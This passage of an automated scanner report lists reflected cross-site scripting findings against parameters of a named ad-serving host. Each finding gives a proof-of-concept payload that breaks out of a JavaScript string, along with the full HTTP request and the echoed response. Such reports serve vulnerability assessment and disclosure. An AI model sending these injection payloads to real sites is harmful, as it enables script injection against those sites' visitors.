Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:36 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:36 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=92971bc8d"-alert(1)-"8e93928398d&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck="; var ba
...[SNIP]...

3.13. http://delivery.steelhousemedia.com/serve [aid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e449d"-alert(1)-"33632f5f96b was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007e449d"-alert(1)-"33632f5f96b&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:22 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:22 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007e449d"-alert(1)-"33632f5f96b&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWV
...[SNIP]...

3.14. http://delivery.steelhousemedia.com/serve [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9ce"-alert(1)-"10cf0bc342e was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=4575984017f9ce"-alert(1)-"10cf0bc342e&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:07 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:07 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=4575984017f9ce"-alert(1)-"10cf0bc342e&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2Z
...[SNIP]...

3.15. http://delivery.steelhousemedia.com/serve [cgid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the cgid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87ec2"-alert(1)-"77fa9aa23f8 was submitted in the cgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=185087ec2"-alert(1)-"77fa9aa23f8&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:23 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:23 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=185087ec2"-alert(1)-"77fa9aa23f8&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvb
...[SNIP]...

3.16. http://delivery.steelhousemedia.com/serve [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11753"-alert(1)-"4907245d196 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=90611753"-alert(1)-"4907245d196&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:14 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:14 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=90611753"-alert(1)-"4907245d196&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyL
...[SNIP]...

3.17. http://delivery.steelhousemedia.com/serve [ck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the ck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 960e2"-alert(1)-"18a6540797e was submitted in the ck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=960e2"-alert(1)-"18a6540797e HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:51 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:51 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
dvid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=960e2"-alert(1)-"18a6540797e"; var base_url = "http://rtb.steelhousemedia.com/capsNotify?aid=9297&cid=906&pp=2.25&guid=d09b7564-e06a-439f-88f1-23754bc64beb"; var secure_url = "https://rtb.steelhousemedia.com/capsNotify?aid=9297&c
...[SNIP]...

3.18. http://delivery.steelhousemedia.com/serve [eid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the eid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45678"-alert(1)-"fd7002ae68b was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=6245678"-alert(1)-"fd7002ae68b&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
